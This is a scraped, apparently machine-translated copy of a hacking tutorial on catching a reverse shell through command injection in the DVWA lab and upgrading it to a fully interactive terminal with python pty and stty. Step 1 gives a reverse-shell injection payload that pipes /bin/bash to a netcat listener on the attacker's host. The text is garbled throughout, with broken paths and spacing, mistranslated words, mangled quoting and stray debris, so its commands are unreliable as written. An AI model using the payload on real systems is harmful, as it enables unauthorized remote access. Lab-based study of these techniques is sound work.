قالب وردپرس درنا توس
Home / Tips and Tricks / Upgrading a Dumb Shell to a Fully Interactive Shell for More Flexibility «Null Byte :: WonderHowTo

Upgrading a Dumb Shell to a Fully Interactive Shell for More Flexibility «Null Byte :: WonderHowTo



One of the most exciting things about being an ethical hacker is, in my opinion, catching a reverse shell. Often, however, these shells are limited because they lack the full power and functionality of a suitable terminal. Certain things do not work in these environments and can be difficult to work with. Fortunately, with a few commands, we can upgrade to a fully interactive shell with all the bells and whistles.

Working with inverted shells can often be frustrating if you only have one "dumb" shell. A dumb shell is a kind of shell that does not have the full functionality of a proper terminal. This means that things like tab filling, keyboard shortcuts, and terminal history just do not exist.

Certain commands like su do not work in fools. Text editors do not work very well even under these conditions, which can be painful.

Maybe it's the most annoying thing that can happen (I'm sure it happened to many of you) to accidentally lose your session by clicking the wrong button key. Suppose you execute a command that hangs, and you instinctively press Control-C to abort it. Well, there goes your shell. It can be annoying, especially if there are a lot of steps to get this shell.

However, with a bit of command-line magic, we can work around that limitation and prevail with a fully functional interactive shell.

Step 1
: Obtain a Restricted Shell

To begin, we use the command injection to get our initial shell. For demonstration, we use DVWA (Damn Vulnerable Web App), but you can use a similar test configuration. Navigate to DVWA and sign in with the default credentials.

Next, go to the DVWA Security page and change the security level to Low. This will ensure that everything is working properly.

Now we can launch a listener on Kali with Netcat to intercept incoming connections to our computer. The flags can all be grouped as -lvp where -l launches a listener, -v details it and gives -p the port on ( 1234 in this exercise).

  ~ # nc-lvp 1234

Listen for [any] 1234 ... 

In DVWA, navigate to the "Command Execution" page. It will allow us to restrict a system command to the standard functionality of pinging an IP address.

The entire command is listed below. It tells the target to connect to our computer via port 1234 via Netcat and then run a bash shell.

  localhost && nc 10.10.0.1 1234 -e / bin / bash 

Once we have clicked "Submit", we should see a connection to our listener open. No prompt is displayed, only a flashing cursor.

  10.10.0.50: Inverse host search failed: Unknown host
Connecting to [10.10.0.1] by (UNKNOWN) [10.10.0.50] 52685 

This is how many shells look, especially after being retrieved from a web application. When we execute a command like id we can see that it works.

  id

uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data) 

Step 2: Create a bash shell

One of the simplest and most reliable ways to update a silly shell A fully interactive shell can be created with Python. If the target is a Linux box, you will probably have a version of Python installed.

First, check which version of Python is installed with the command which .

  which python

/ usr / bin / python 

Usually, Python or Python3 is displayed. Now we can use it to create a proper bash shell. Below, the flag -c indicates the command to execute. In this case, the module pty is imported first. The pty module provides the shell with pseudo-terminal functions that are useful for some commands that require a terminal environment to execute. Then a bash shell will be created and after pressing Enter we should see a real command prompt.

  python -c # import pty; pty.spawn ("/ bin / bash") & # 39;

www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ 

Well, that's a little bit better, but we do not have any tab completion or command history and if we push Control-C it will leave the session. Next, we'll be upgrading to a fully functional shell with a little Linux Fu.

Step 3: Upgrade to Interactive Shell

The next thing we need to do does not seem to be intuitive, but the shell with [19459007zuhinterlegen] Control-Z .

  www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ ^ Z

[1] + Stopped nc -lvp 1234
root @ drd: ~ # 

We need some information about our own terminal. Use the command echo to display the currently selected terminal.

  ~ # echo $ TERM

xterm-256color 

Enter stty -a to display the properties.

  ~ # stty -a

Speed ​​38400 baud; Rows 56; Columns 213; line = 0;
intr = ^ C; quit = ^ ; Delete = ^? kill = ^ U; eof = ^ D; eol = ; eol2 = ; swtch = ; start = ^ Q; stop = ^ S; susp = ^ Z; rprnt = ^ R; werase = ^ W; lnext = ^ V; reject = ^ O; min = 1; Time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr -icrnlixon -ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -crnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echo echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc 

Make note of the number of rows and columns. Next, enter the following command, which lets you pass keyboard shortcuts.

  ~ # stty raw -echo 

Now enter fg to put the background shell in the foreground. You can not see these letters on the screen as you type, but press . Then enter and the Netcat command will be displayed automatically. Next, enter reset to reset the terminal. It will look weird if you enter it, but it works.

  ~ # nc-lvp 1234
reset 

You may be prompted to set the terminal type. Sometimes the color version of xterm does not work, so we can just use the regular xterm instead.

  reset: unknown terminal type unknown
Terminal type? xterm 256color

Reset: unknown terminal type xterm-256color
Terminal type? xterm 

If you can not clear the screen or use the up arrow to view the history, use the following commands to redetermine the terminal type and shell.

  www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ export TERM = xterm
www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ export SHELL = bash 

Now you just have to set the appropriate size of the terminal. Sometimes, when we drill down into a directory or have a very long prompt, the input is wrapped and hard to read. By putting the rows and columns on the same level as our native terminal, we can avoid this.

  www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ stty rows 56 columns 213 

We now have a fully interactive shell that lets us use keyboard shortcuts, clear the screen, save the history, and Use all the features of your favorite local terminal over a Netcat connection.

Summary

Today we learned about stupid shells and their limitations, as well as what might go wrong with their use. First, we got our first shell via command injection. We then used Python to create a bash shell and finally mirror our current terminal configuration to upgrade to a fully interactive shell. With this technique, you can now stylishly reverse the shell.

Cover photo by Tatiana Shepeleva / 123RF; Screenshots of drd_ / zero byte

Source link